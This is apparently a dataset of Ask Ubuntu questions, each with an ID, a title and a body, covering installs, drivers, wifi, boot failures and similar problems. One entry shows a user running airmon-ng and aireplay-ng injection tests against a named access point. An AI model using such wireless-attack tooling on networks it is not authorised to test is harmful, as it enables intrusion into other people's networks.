443450	why ca n't i install noise ( music player ) in ubuntu 13.10 ?	i followed these steps to install the music player noise in my ubuntu 13.10. sudo add-apt-repository ppa : nemequ/sqlheavy sudo add-apt-repository ppa : elementary-os/daily sudo apt-get update sudo apt-get install noise but , the terminal shows me no se ha podido localizar el paquete noise ( could not locate the noise package , yes , my ubuntu is in spanish ) . what can i do ?
443453	many packages been uninstalled by mistake ? how to recover ubuntu	i uninstalled python2.7 first which ended up deleting many dependencies as well . then trying to fins that problem i ended up deleting more packages . but even from the begining of my installation package manager didnt work . thats why i wanted to uninstall python to fix it . now when i do sudo apt-get install -f ... ... 0 upgraded , 0 installed ... . sudo apt-get update reading package lists ... done any way wayi can fix this apt-get install and install all the necessary packagers . now i can oly log into terminal . windo login fails .
443456	ca n't run installed version	i burned the 32 bit ios file and booted ubuntu on my old xp machine from the cd . i liked the look and it worked fine . tried installing and the installation seemed to work , but when i get to the password window , the mouse wo n't work and after a few seconds the screen goes weird , like the settings are wrong , all filled with jagged lines . does anyone have any idea what the problem is ? thanks dave
443457	ca n't login into ubuntu 13.10 , ca n't ctrl alt f1	as the title sugests , i 'm stuck at the login screen of my ubuntu 13.10 . i enter my password correctly , press enter and the screen goes black for a second then the login screen shows again . tried several solutions already . if i press ctrl alt f1 ( any f , in fact ) the screen goes black and then loading screen again . i 'm really desperate for a solution ... thanks in advance .
443458	permissions of locale	i trialled a japanese keyboard for ibus , but later decided to remove it . however , japanese characters still pop up all over the place - including in mozilla thunderbird and the terminal . why will it not let me edit the permissions for the locale file at : .etc/default/ it claims that i am `` not the owner '' .
443461	how do i fix disappearing cursor/mouse on 13.10 installed on flash	i just recently installed ubuntu 13.10 on a flash drive so i can pug it into any computer at home and school and do my work . it was working perfectly until just a half hour ago when i booted it on an hp laptop and the cursor/mouse disappeared . i rebooted 6 times if i`m correct and it still would n't work . what i did notice was when i boot it up , the ubuntu loading screen with the four dots that light up , it was slightly larger than usual and pixelized for some apparent reason . then i tried another hp laptop and it would n't even boot . the problem continues . is there a way to fix it or should i just re-install the os ? computer that would n't boot ubuntu : hp envy 14 beats audio edition computer with disapearing cursor/mouse : hp pavilion dv4 , the worst one from about 6 years ago . flash with ubuntu : lexar flip 16 gigabytes i do n't mind doing a clean re-install it does n't take long i just would like to know if i can fix it . and the os worked perfectly until i booted it up just half in hour ago .
443462	installing broadcom driver failed to install acer aspireone	i 'm sure there is an answer to my problem somewhere , but i 'm not able to find it . i 'm a complete newbie , just downloaded ubuntu 12.04 lts a few days ago . it 's on double boot at the moment as i wanted to make sure it 's gon na work for me . as my wi-fi did n't work , i 've followed the steps mentioned here : how to install broadcom wireless drivers ? ( bcm43xx ) , number 51 . all went ok , but when i tried to install it ( after reboot ) i got an error message : su @ ubuntu : ~ $ sudo apt-get install bash : syntax error near unexpected token `newline' i imagine it 's a simple error , but i have no idea what . sorry to bother you , but i do n't want to make too much of a mess and create more problems . oh , i did try to install the driver through `` addistional driver '' , but got an error message there , too . please keep in mind that i have no idea what i 'm doing and am just trying to follow directions : - ) . thank you . suzana
443464	( solved ) ca n't connect to wifi that requires username & password only	i 'm a very very basic beginner so let me give as much detail that i can : i run lubuntu 13.04 i can connect to public wifi 's and also home private wifi networks that only need a password . i can not connect to secure wifi for my school ( university of toledo ) where i need to enter a username and password . i 'm entering my keyring and then i get prompted with the username which has now become saved and then the password . it just shows the wifi loading and then returns to the login screen over and over . anyone know why this is only occuring for wifi 's using username & pws only ? i would need baby step help with someone walking me through it all ... but i 'm eager to learn ! i tried fooling around with a few of the dropdown menus in the network settings for wpa and stuff ( i do n't really know those mean ) , but it did n't work .
443466	folder from which to restore accidentally deleted files	ubuntu 12.04 . i accidentally deleted some files . i tried restoring them using nautilus , got an error message ( `` another backup operation in progress '' - none that i started ) . from memory , is n't there a folder which simply holds deleted files ? i think i went to one such folder once and was able to easily copy over what had been deleted . could someone please remind me of the path and name where to go ?
443469	unable to locate printer	i have 2 , completely different , network printers on the lan , xubuntu can not wake either of them from hibernation , windows computers wake them just fine . what 's the trick ?
443470	boot problem upon starting ubuntu	when the ubuntu boot screen comes up , the title page appears and the progression dots flow under the title . then the following occurs : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built in shell ( ash ) ( initramfs ) unable to find a medium containing a live file system what do i need to do to provide a medium containing a live file system ? the machine is a amd 6400 , 4 gb ram , 500 gb hard drive .
443472	64-bit edition alongside 32-bit windows 7	can i install ubuntu 's 64-bit edition alongside windows 7 32-bit on a toshiba a200 ( 3gb ram ) or it 's recommended to install 32-bit edition ?
443474	how can i enable 3d acceleration for ubuntu as a vmware guest ?	i use ubuntu on an imac 8,1 . i have n't been able to figure out how to enable 3d support for vmware workstation 10 . ubuntu lists several nvidia options but i so far they lock up the screen on log in . what are some tools for me try ?
443478	ubuntu do n't recognize windows7 partitions	i have a macbookpro9,2 and i have installed windows7 64bits : '' c '' partition : windows7 64bits ; '' d '' partition : ntfs for data ; free space to install ubuntu 14.04 ; the problem is when i try to install ubuntu , i am surprised that the hard disk is all free ( partitions `` c '' and `` d '' do n't appear ) . i have also tried with ubuntu 10.10 and i have the same problem . thanks for your response !
443479	is a reboot the only way to get back into the gui after pressing `` ctrl+alt+f12 '' ?	i just read what does `` ctrl + alt + f12 '' do ? . it was helpful , but i 'm left with the question : if you accidentally press `` ctrl+alt+f12 '' is the only way out of the virtual terminal to reboot the machine ? i tried every combination of ( ctrl , ctrl+alt , ctrl+shift , ctrl+alt+shift , alt , alt+shift , shift ) + each of the f1-12 keys to try and get back to the gui . nothing worked . is the only way back into the gui to reboot the machine ?
443480	trouble compliling wifix	been having wireless issues so wanted to try wifix and see what it 's all about , alas i can not get it to complile . > . < i have tried too many ways to no avail . has anyone successfully gotten it installed ? if so any help would be appreciated ! running 12.4
443481	install opencv eclipse	i am using ubuntu 13.10 and i am trying to install opencv on eclipse . i am following this tutorial link i do not know where is my library . this what i obtain when i try to find the files . donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ pkg-config -- libs opencv -lopencv_calib3d -lopencv_contrib -lopencv_core -lopencv_features2d -lopencv_flann -lopencv_gpu -lopencv_highgui -lopencv_imgproc -lopencv_legacy -lopencv_ml -lopencv_objdetect -lopencv_ocl -lopencv_photo -lopencv_stitching -lopencv_superres -lopencv_ts -lopencv_video -lopencv_videostab donbeo @ donbeo-hp-elitebook-folio-9470m : ~ $ it does not report the file path . i have tried different paths but i receiving always compiling error 22:26:06 **** incremental build of configuration debug for project machine_learning **** make all building target : machine_learning invoking : cross g++ linker g++ -l/usr/local/lib -o `` machine_learning '' ./src/prova.o -lopencv_core -lopencv_calib3d -lopencv_objdetect -lopencv_contrib -lopencv_legacy -lopencv_flann -lopencv_imgproc -lopencv_highgui -lopencv_ml -lopencv_video -l\ opencv_features2d /usr/bin/ld : can not find -l opencv_features2d collect2 : error : ld returned 1 exit status make : *** [ machine_learning ] error 1 22:26:06 build finished ( took 114ms ) the error could be in the lib path . how can i solve this ? edit : i had various problems after the installation . in particular after reboot and login i obtained a black screen . as expressed in this post error ubuntu 13.10 blackscreen i have been able to restore my system using the information in this blog http : //www.anickle.com/2014/01/19/ubuntu-13-10-intel-graphics-killed-by-opencv/ now seems that it is partially working . i am able to run this example code : # include < opencv2/core/core.hpp > # include < opencv2/highgui/highgui.hpp > # include < opencv2/ml/ml.hpp > using namespace cv ; int main ( ) { // data for visual representation int width = 512 , height = 512 ; mat image = mat : :zeros ( height , width , cv_8uc3 ) ; // set up training data float labels [ 4 ] = { 1.0 , -1.0 , -1.0 , -1.0 } ; mat labelsmat ( 4 , 1 , cv_32fc1 , labels ) ; float trainingdata [ 4 ] [ 2 ] = { { 501 , 10 } , { 255 , 10 } , { 501 , 255 } , { 10 , 501 } } ; mat trainingdatamat ( 4 , 2 , cv_32fc1 , trainingdata ) ; // set up svm 's parameters cvsvmparams params ; params.svm_type = cvsvm : :c_svc ; params.kernel_type = cvsvm : :linear ; params.term_crit = cvtermcriteria ( cv_termcrit_iter , 100 , 1e-6 ) ; // train the svm cvsvm svm ; svm.train ( trainingdatamat , labelsmat , mat ( ) , mat ( ) , params ) ; vec3b green ( 0,255,0 ) , blue ( 255,0,0 ) ; // show the decision regions given by the svm for ( int i = 0 ; i < image.rows ; ++i ) for ( int j = 0 ; j < image.cols ; ++j ) { mat samplemat = ( mat_ < float > ( 1,2 ) < < j , i ) ; float response = svm.predict ( samplemat ) ; if ( response == 1 ) image.at < vec3b > ( i , j ) = green ; else if ( response == -1 ) image.at < vec3b > ( i , j ) = blue ; } // show the training data int thickness = -1 ; int linetype = 8 ; circle ( image , point ( 501 , 10 ) , 5 , scalar ( 0 , 0 , 0 ) , thickness , linetype ) ; circle ( image , point ( 255 , 10 ) , 5 , scalar ( 255 , 255 , 255 ) , thickness , linetype ) ; circle ( image , point ( 501 , 255 ) , 5 , scalar ( 255 , 255 , 255 ) , thickness , linetype ) ; circle ( image , point ( 10 , 501 ) , 5 , scalar ( 255 , 255 , 255 ) , thickness , linetype ) ; // show support vectors thickness = 2 ; linetype = 8 ; int c = svm.get_support_vector_count ( ) ; for ( int i = 0 ; i < c ; ++i ) { const float* v = svm.get_support_vector ( i ) ; circle ( image , point ( ( int ) v [ 0 ] , ( int ) v [ 1 ] ) , 6 , scalar ( 128 , 128 , 128 ) , thickness , linetype ) ; } imwrite ( `` result.png '' , image ) ; // save the image imshow ( `` svm simple example '' , image ) ; // show it to the user waitkey ( 0 ) ; } but i receive and error when i try to run # include < cv.h > # include < highgui.h > using namespace cv ; int main ( int argc , char** argv ) { mat image ; image = imread ( argv [ 1 ] , 1 ) ; if ( argc ! = 2 || ! image.data ) { printf ( `` no image data \n '' ) ; return -1 ; } namedwindow ( `` display image '' , cv_window_autosize ) ; imshow ( `` display image '' , image ) ; waitkey ( 0 ) ; return 0 ; } invoking : cross g++ compiler g++ -o0 -g3 -wall -c -fmessage-length=0 -mmd -mp -mf '' src/prova.d '' -mt '' src/prova.d '' -o `` src/prova.o '' `` ../src/prova.cpp '' ../src/prova.cpp:1:16 : fatal error : cv.h : no such file or directory # include < cv.h >
443483	projects in /var/www folder are not accessible ?	i am using ubuntu 13.10 and come from ubuntu 13.04 . first check locahost , it 's work fine . phpmyadmin is also work fine . i look some related problem here . but some similarities with this answer and still i have problem when i write for-example http : //localhost/php_work/ in a browser . problem forbidden you do n't have permission to access /php_work/ on this server . path of php_work folder is : /var/www/php_work following results of line write by using terminal : conf.d files zeb @ zeb-lenovo-b570 : /etc/apache2/conf.d $ ls result : empty folder zeb @ zeb-lenovo-b570 : /etc/apache2/conf-available $ ls result : charset.conf localized-error-pages.conf security.conf javascript-common.conf other-vhosts-access-log.conf serve-cgi-bin.conf site file zeb @ zeb-lenovo-b570 : /etc/apache2/sites-available $ ls result : 000-default.conf default-ssl.conf do n't know how and what changes make in virtual host directives . or what should i do to sort it out , any help would be appreciated .
443484	lost toolbar icons on files 3.6.3 ubuntu 13	i tried install diffrent theme but can not fix toolbar icons on files 3.6.3 . please help
443487	ca n't install ubuntu , help ?	with windows xp ending support next tuesday , i was scrapped for time to find another replacement os . i was told to install a linux-based operating system as a replacement and i decided to try this version out . i did n't want to pay someone to install it for me , so i tried it on my own . i downloaded `` ubuntu 12.04 lts- 32-bit '' ( http : //www.ubuntu.com/download/desktop ) and waited about an hour for it to download the 730 mb file . it was an image file ( iso file ) , so i used `` free iso burner '' to attempt to burn it . after three failed attempts to burn the file on a 4.7 gb disk , i extracted the file with winrar . i left the room and came back to find that the ubuntu menu was up . the 730 mb os took up all of the disk space for the 4.7 gb cd for some reason . anyways , i clicked `` demo and full installation , '' then clicked on `` help me boot from a live cd , '' since the computer did n't boot from the cd after four attempts . it looked like it was working , but it stopped about the quarter of the way with the message : an error has occur : permission denied . for more information please see the log file : c : \docume~1\hp\locals~1\temp\wubi-12.04.4-rev280.log link to log ( http : //paste.ubuntu.com/7205612/ ) and that 's my problem so far . do i erase everything that was written on that disk and try to burn it over ? do i need an additional program to run it ? any help would be appreciated . my specs : hp ( l2000 ) windows xp professional edition ( 32-bit ) processor : amd turion ( tm ) 64 mobile technology ml-40 hard drive : 93 gb worth of space available ( 45 gb used ) total ram : 1024 mb dispaly adapter : ati mobility radeon xpress 200 ( video ram : 128 mb )
443491	error : file not found when trying to boot with boot stick	i have put a couple of old hds in an old system that has been running ubuntu . one of the disks is the old home partition , and the other is some other random ex-ubuntu disk . the old root partition disk is no longer in the system . i have a boot stick that works perfectly on other linux systems . i also have a boot disk that works on windows systems . whether i stick in one or the other , or none of them , the result is the same : when i boot , i get : `` error : file not found '' and a `` grub rescue > '' prompt . `` ls '' yields : ( hd0 ) ( hd0,1 ) ( hd1 ) ( hd1,1 ) without the sticks in , and : ( hd0 ) ( hd0,1 ) ( hd1 ) ( hd1,1 ) ( hd2 ) ( hd2,1 ) with one of the sticks in . the solutions i have found online involve trying to rescue a machine that has a system on it , but mine does n't , and should n't . i want it to recognize the boot stick . in the bios , the first boot device is `` removable dev '' , while it should perhaps have said `` sandisk cruzer '' , like the hd overview does ? however , there is no sandisk cruzer option in the boot priority menu .
443495	what must be done after rescuing kernel panic	i had used gtkorphan app to remove unused packages on ubuntu 12.10 , however i accepted to delete all the listed packages that it had offered and it caused a kernel panic because i did n't noticed that some of them was system files and libs . i could manage to get rid of kernel panic somehow but now i ca n't use most plug and play devices such as mouse , wireless etc ( no problem for flash drives ) . what can be done to fix the damage on system ?
443497	dota2 fps freeze	so i installed steam and dota 2 on my 13.10 ubuntu . the game starts up and works with acceptable fps , but every 5-10 minutes or so it just freezes for 2-5 seconds . i 'm positive this is not network lag since it happens also in the loading screen and in offline bot games . during these freezes my pointer can move but the in-game clock , along with everything else , stops . i thought this was an issue with my graphics card , so i checked the drivers i was using for my amd radeon hd 67something : the open source drivers were on by default ( xserver-xorg-video-ati ) , but it said the fglrx drivers were available ; i tried installing those but that completely screwed over my graphic interface so i had to reinstall everything . do you have any idea on how to narrow down my problem ( the dota one , i 've given up on the drivers ) ? will be happy to provide any information needed . edit : i just noticed that this also happens in minecraft , so i think it might be an opengl problem ... edit # 2 : i had a look at the cpu usage graphs , it looks like during these freezes the game just stops using computing power ; dunno if that 's helpful ...
443498	xubuntu : can i align the clock / notification / wifi etc area to the right - like win xp ?	hi and sorry for a simple question ... this is my first linux installation for about a decade . fresh xubuntu install , in light of xp end . i ca n't seem to align my clock , wifi info , skype status , lanuguage flag , audio settings , or username to the right . they float on the end of the panel jumping left and right anytime i close/open an application . i 'm an xp user , and am migrating to linux . i can cope with the learning curve and the differences , but i 'd like things to be similar where possible . having the clock and notification area locked to screen-right would be nice , simply for the consistence of always knowing where it is , but also to simplify seeing other apps in the panel . i do n't know if i did something to break things ( i almost certainly did ) and make it float , but i ca n't seem to fix it . i did n't want two ( or more ) virtual screens , so i think i deleted one , i wanted to simplify everything at first , meaning one screen only , then learn and grow from there . it 's possible ( read : likely ) that something i did allowed the clock etc to float . anyway , it 's pretty annoying , watching that clock jumping back and forth . almost as annoying as how long this post has got . i do thank you for any and all assistance .
443506	sd card only recognized if mounted during boot	i have a bug with my sd-card reader on my laptop* . my computer does n't recognize/see a sd-card when mounted . i found out though that i can make it read it if i boot with the sd-card inserted . if i do so , i can mount it afterwards without problem - until i restart it without an sd-card mounted/inserted . i know i can use the terminal command echo 1 > /sys/bus/pci/rescan , however both ways ( rebooting or typing this command ) is an inconvenient way of doing so . is there a way to fix this , so i would n't need to type/paste the command every time i want to mount an sd-card ?
443507	how can i uninstall ubuntu ?	like i know you have to run the sudo apt-get remove thing or whatever but the thing is that i dont exactly know what that is ... i need help knowing what that is and where to find it ...
443511	lp stat is not showing all printers ?	i currently have about 6 printers installed on ubuntu 13.10 , but lpstat is only showing 3 of them . what is the best way to debug this , so that i can print to all printers from the command line , just like i could from a gui application ?
443512	passphrase for ssh not working	i know what my passphrase is for ssh , but the computer is not accepting it on on of my computers . i am trying to run this command from my desktop . ssh brian @ host ( ip address ) -l 5900 : localhost:5900 `` x11vnc -display :0 -noxdamage '' i have tested the passphrase on my laptoop , and it will take it , but not on my desktop . my guess is that i need the passphrase and the sudo password together somehow . the reason that i think this is due to the fact that i get this error message when i get rejected : permission denied ( publickey , password ) . any help that you have to offer is appreciated .
443515	piping into graphicsmagick	i 'm still learning the command line , and i 'm having trouble piping a list of files into graphicsmagick for conversion to pdf : find . -type f | sort | gm convert file.pdf this gives the error : gm convert : request did not return an image . can i do this without resorting to more complicated methods ?
443516	aireplay-ng wo n't work	my wireless interface is the following : wlan0 link encap : ethernet hwaddr 1c : af : f7:77:50:38 inet adr:192.168.0.18 bcast:192.168.0.255 masque:255.255.255.0 adr inet6 : fe80 : :1eaf : f7ff : fe77:5038/64 scope : lien up broadcast running mtu:1500 metric:1 packets reรงus:832822 erreurs:0 :12 overruns:0 frame:0 tx packets:681569 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reรงus:727121710 ( 727.1 mb ) octets transmis:328963541 ( 328.9 mb ) i am trying to enable monitoring mode on wlan0 by doing this : $ sudo airmon-ng stop wlan0 interface chipset driver wlan0 unknown rt2800usb - [ phy0 ] ( monitor mode disabled ) and then this $ sudo airmon-ng start wlan0 11 found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 1014 avahi-daemon 1016 avahi-daemon 1046 wpa_supplicant 7016 networkmanager 7022 dhclient process with pid 7022 ( dhclient ) is running on interface wlan0 interface chipset driver wlan0 unknown rt2800usb - [ phy0 ] ( monitor mode enabled on mon0 ) i am using channel 11 because this is the channel used by the access point i want to work with . my problem is that aireplay-ng does not seem to enable the monitor mode on wlan0 . instead it creates a kind of emulated card called mon0 and if try to run $ sudo aireplay-ng -- test -a 2e : ef : b7:54:7c:70 wlan0 01:12:20 waiting for beacon frame ( bssid : 2e : ef : b7:54:7c:70 ) on channel -1 01:12:20 wlan0 is on channel -1 , but the ap uses channel 11 or $ sudo aireplay-ng -- test -a 2e : ef : b7:54:7c:70 mon0 01:12:13 waiting for beacon frame ( bssid : 2e : ef : b7:54:7c:70 ) on channel -1 01:12:13 mon0 is on channel -1 , but the ap uses channel 11 you can clearly see that channel used is -1 instead of 11 it does not work i tried to kill networkmanager and dhclient but they appear to resurrect endlessly . also not sure if my board driver ( rt2800usb ) implies some subtelties i am not aware of .
443518	how long can i continue to use ubuntu 13.10 after the release of 14.4	now that i have purged `` ubuntu one '' from my system and 13.10 seems to be working very well , i am a little hesitant about the upgrade to 14.4
443524	xfce4 boots into an xterm-like environment	most probably after a forced reboot , whenever i load xfce4 on my ubuntu 13.04 i get this environment that looks like a buffed-up xterm , where i have an invisible mouse cursor : when i move around i can not see a cursor but when it happens to go hover over a press-able button , the button changes color . i tried quitting that and starting x by startx but the only thing i got was a black screen . i proceeded as following : tried uninstalling and reinstalling xfce4 by : sudo apt-get remove -- purge xfce4 sudo apt-get install xfce4 it did not work so i also tried : sudo apt-get remove -- purge libxfce4util-common sudo apt-get install xfce4 it also did not work so after removing xfce4 i also tried removing and reinstalling xorg : sudo apt-get remove -- purge xserver-xorg sudo apt-get install xserver-xorg sudo dpkg-reconfigure xserver-xorg unfortunately this did not work either so i tried deleting also ~/.xauthority* but this did not work either . i also attempted to startx after reinstalling xorg and before installing xfce4 but i was again getting just a black screen which makes very worried . any ideas ?
443528	why does 12.04 help display links but no text ?	when i first installed ubuntu 12.04 a few days ago , i had no trouble opening help from the dash . beginning yesterday , however , when i open help it shows me links to the various subtopics , but there is no text explaining the topic . for example , in user & system settings i 'm showed links to `` color management , '' `` display & screen , '' `` keyboards , '' and `` mouse . '' under the links , or after following the links , there is no text . how do i restore the text , so that help will actually ... you know ... help ?
443529	minecraft suddenly stops working ?	so , i have minecraft on ubuntu 12.04 . it is a windows program , but i was able to use wine windows program loader to get it to run . everything was working fine and dandy earlier today . but , later , when i tried to get it to run , i got an error saying `` bad format '' and `` there is no windows program configured to open this type of file . '' what would cause it to randomly stop working ? edit : i remember that , earlier today , it started up and began updating -- then the computer froze and i had to reboot . now it wo n't work .
443530	macbook 2,1 ( no cd install problem )	i am very frustrated . i been trying for almost 2 weeks to put ubuntu on my macbook ( 2,1 ) mid-2007 13 '' laptop . my combo drive does not work anymore . i tried the usb stick install method where u make a bootable ubuntu usb from the osx terminal . i installed refit and tried to boot from the usb stick ( kingston 8gb ) . it gives me some error like `` no bootable device found and press any key '' . i have tried the mac specific amd64 iso and the regular iso and it 's a no go . i get the same blank black screen with the annoying error message . what am i doing wrong ? please help . i want ubuntu on my macbook with lion ! : (
443537	realtek rtl8188cus	i am trying to use an airlink wifi dongle with rtl8188cus chip . it has not been going very well . i found a link to a driver installer download rtl8192cu-tjp-dkms_1.6_all.deb 1.0 mb when i run this installer i get the error : ( reading database ... 305433 files and directories currently installed . ) preparing to replace rtl8192cu-tjp-dkms 1.6 ( using ... /rtl8192cu-tjp-dkms_1.6_all.deb ) ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 1.6 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . unpacking replacement rtl8192cu-tjp-dkms ... setting up rtl8192cu-tjp-dkms ( 1.6 ) ... loading new rtl8192cu-tjp-1.6 dkms files ... first installation : checking all kernels ... building only for 3.11.0-19-generic building for architecture i386 building initial module for 3.11.0-19-generic error ! bad return status for module build on kernel : 3.11.0-19-generic ( i386 ) consult /var/lib/dkms/rtl8192cu-tjp/1.6/build/make.log for more information . the make log is this : dkms make.log for rtl8192cu-tjp-1.6 for kernel 3.11.0-19-generic ( i386 ) fri apr 4 20:25:18 cdt 2014 /usr/src/linux-headers-3.11.0-19-generic/scripts/gcc-version.sh : line 25 : gcc : command not found /usr/src/linux-headers-3.11.0-19-generic/scripts/gcc-version.sh : line 26 : gcc : command not found make : entering directory `/usr/src/linux-headers-3.11.0-19-generic' /usr/src/linux-headers-3.11.0-19-generic/arch/x86/makefile:98 : stack protector enabled but no compiler support make : gcc : command not found ld /var/lib/dkms/rtl8192cu-tjp/1.6/build/built-in.o cc [ m ] /var/lib/dkms/rtl8192cu-tjp/1.6/build/core/rtw_cmd.o /bin/sh : 1 : gcc : not found make [ 1 ] : *** [ /var/lib/dkms/rtl8192cu-tjp/1.6/build/core/rtw_cmd.o ] error 127 make : *** [ _module_/var/lib/dkms/rtl8192cu-tjp/1.6/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.11.0-19-generic' if anyone understands any of this please help .
443539	can an iso file be erased from a liveusb ?	i have decided to install ubuntu alongside mac os x on my computer . i am wondering if the ubuntu installer iso file can be erased from my usb after installation , and will be able to use my usb normally .
443543	logwatch send email to @ outlook.com	i just installed logwatch and used this guid . but i ca n't get it to send emails.. i would like to send them to my @ outlook.com adress , if possible . i ca n't seem to find any guid on google . do i need to install/configur a smtp server / postfix ? i 'm running ubuntu server 12.04.4 any help ?
443546	can connect using putty but ca n't with psftp	i am new to ubuntu and am having a lot of issues when trying to get psftp to connect to my ubuntu server , which i am running in virtualbox . i have open-ssh server and client installed on the server and can connect using putty just fine , but psftp keeps giving me the error `` connection refused '' . when i check if the port is open it says it is and the service is running . i really need help guys as this is sending me insane . please help a newb thanks in advance , logan
443547	how to know wireless network driver .	i am using ubuntu 12.04 . how to know that my wireless card driver is ath9k or ath5k ?
443549	how to install micromax 352g modem in ubuntu 13.10	i am new to ubuntu , please guide me to install micromax 352g modem in ubuntu 13.10
443551	how to deal with bug in 13.10 that freezes computer when resizing windows ?	i 'm a beginner to ubuntu and there 's a bug in 13.10 than freezes the computer around every 5th time you try to maximize a window by dragging it up against the top of the screen . after this happened , you would n't be able to click on anything , although your mouse would move , and you could n't open terminal and would have to restart your computer . i figured out this fix and thought i 'd share .
443556	upgrading 12.04 to 14.04 beta	i was trying to upgrade from 12.04 lt to 14.04 beta using update manager and using this command . sudo do-release-upgrade -- check-dist-upgrade-only -- devel-release but it is showing checking for a new ubuntu release new release '12.10 ' available . run 'do-release-upgrade ' to upgrade to it how can i skip the other versions and upgrade directly to 14.04 beta ?
443557	how does ubuntu one know when to automatically sync files ?	i am curious about how ubuntu one automatic file sync works under the hood . when i add or change a file in my file manager , how does it know that the change occurred and it needs to sync it ? this will likely need a somewhat technical answer .
443560	how do i reset the colors of my terminal ?	help ! somehow my terminal looks like this : it 's nearly impossible to read the text . how can i fix it without exiting the terminal ?
443564	minecraft 1.7 closing on ubuntu 12.04 64bit	i somehow got a 64bit version of ubuntu somehow and my minecraft wo n't work anymore . the launcher closes then the game window shows up but it 's more a screenshot of my desktop then goes back to launcher . i 've tried everything to get minecraft again but i do n't know how to update the native folder in bin since they do n't have that anymore . reinstalling and trying different versions of java does n't work either . any help would be awesome !
443565	wifi does not work after system sleep	i recently had to reinstall 12.04 onto my desktop system , due to stability issues . everything has been okay so far except for wifi which does n't come back up after a system sleep . rebooting the system does bring it back , and this was n't an issue prior to reinstalling 12.04 . i 'm using 12.04 , 64bit version which is what i was running previously , and i never experienced this problem . i have tried solutions listed in : how to restart networking ? eth0 rj45 does not connect after sleep mode in xubuntu 12.04 [ sudo nmcli nm sleep false ; also creating a custom sleep script that calls gnome-screensaver . my system balks at the -- system flag and bails . ] how to restart the networking service ? [ sudo service network-manager restart ; also sudo ifdown -- exclude=lo -a & & sudo ifup -- exclude=lo -a ] https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/771857 [ rmmod ath5k & & modprobe ath5k ] http : //www.webupd8.org/2013/01/fix-wireless-or-wired-network-not.html [ create /etc/pm/config.d/unload_modules containing suspend_modules= '' $ suspend_modules ath5k '' output from lspci -nnk | grep -a2 -i net is : 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : gigabyte technology co. , ltd motherboard [ 1458 : e000 ] kernel driver in use : r8169 04:01.0 ethernet controller [ 0200 ] : qualcomm atheros ar2413/ar2414 wireless network adapter [ ar5005g ( s ) 802.11bg ] [ 168c:001a ] ( rev 01 ) subsystem : d-link system inc airplus g dwl-g510 wireless pci adapter ( rev.b ) [ 1186:3a16 ] kernel driver in use : ath5k i suspect this is a bug , but would like to know if there 's something additional i can do to try and fix this .
443567	can i stick with beta ?	ubuntu 14 beta final was released . can i stick with it officially burn it to my disk as only os and will it let me upgrade within updater to non-beta without new iso ?
443571	sort files in directory by creation date ( birth )	in my download folder i have a lot of files.i need first a way to arrange them by type second files with same type arrangement become by the type that i added ( or can say downloaded or birth ( if i am not wrong ) ) them to my downloads folder . please take a look enter link description here in my downloads directory i have pdf , zip and etc . when i go to my downloads directory first i want to see my tar.gz are around together ( arrange by type ) second i need my tar.gz files have sort of the time when i added to this directory.for example i am looking for the fifth youngest birth time tar.gz file .
443572	how to upgrade phpmyadmin after installing mysql 5.6	after upgrading mysql from 5.5 to 5.6 i got the following error in phpmyadmin : your php mysql library version 5.5.33 differs from your mysql server version 5.6.13 . this may cause unpredictable behavior . the problem would be solved by installing php5-msqlnd but the repository for ubuntu 12.04 lts did n't fix the issue as it says in this launchpad bug report installing via sudo apt-get install phpmyadmin will warn the user that php5-mysqlnd will be marked removed and php5-mysql will be marked install this is the output i got from the command : sudo apt-get install phpmyadmin > the following extra packages will be installed : php5-mysql suggested > packages : mysql-server the following packages will be removed : > php5-mysqlnd the following new packages will be installed : > php5-mysql phpmyadmin thus i will loose mysqlnd which is the new improved driver for mysql api the suggested workaround is to play with dependencies string which i do n't like because it 's not the right way to solve this issue . how can i install phpmyadmin with mysqlnd to support mysql 5.6 in ubuntu 12.04 without playing with dependencies string in the package config
443573	internal wifi not working on boot	i 've got a dell e1505 with a broadcom bcm4311 for internal wifi . when i boot up it ubuntu does n't even acknowledge it and if i click on the network icon all it says is `` wireless networks disconnected '' and no networks are listed . however , if i go to `` connect to hidden wireless network '' and enter my wireless network details it will recognize the adapter and connect to my network and list other nearby networks . the `` connect automatically '' option is checked for my network . i want to be able to start the computer and have it automatically log on to my network without having to do this random workaround . what is wrong here ?
443584	trying ubuntu from live dvd : hangs and/or gives `` unable to find a medium ... '' error	i have an older desktop ( general specs below ) that i want to `` try ubuntu '' ( 12.04.4 , i386 ) on using the live dvd before i install . however , i 'm having several issues . the first few times , after selecting the `` try ubuntu '' option , my computer froze , with black streaks on the reddish orange desktop background , almost like what this user described . however , i was n't able to find the `` nomodeset '' option as described in this post . so i tried adjusting my graphics settings ( resolution , etc . ) by using the little settings icon in the upper right corner before clicking on `` try ubuntu . '' this got me to the desktop several times , although ubuntu reported other problems in a dialog pop-up box , ran slowly , would occasionally freeze up , and i could not use wired networking nor access the internet . i checked the md5 hash of the downloaded file to rule out any download flaws , and so then found out about how to access the pre-boot option screen where integrity of the files on the disc could be verified ( to ensure that there was a proper burn of the iso image ) . here 's where things got interesting . there is a few minutes ' wait after i selected this opiton , and then i get an error stating `` unable to find a medium containing a live file system . '' can anybody help ? i 'm afraid if i install ubuntu , i may encounter the same issues ( or worse ) . also , booting from usb is not an option for me : despite my efforts , my bios wo n't allow it . thanks ! desktop specs : amd athlon 2800 processor 2.08ghz ( single core ) 32mb ram nvidiageforce 6600 gt graphics card
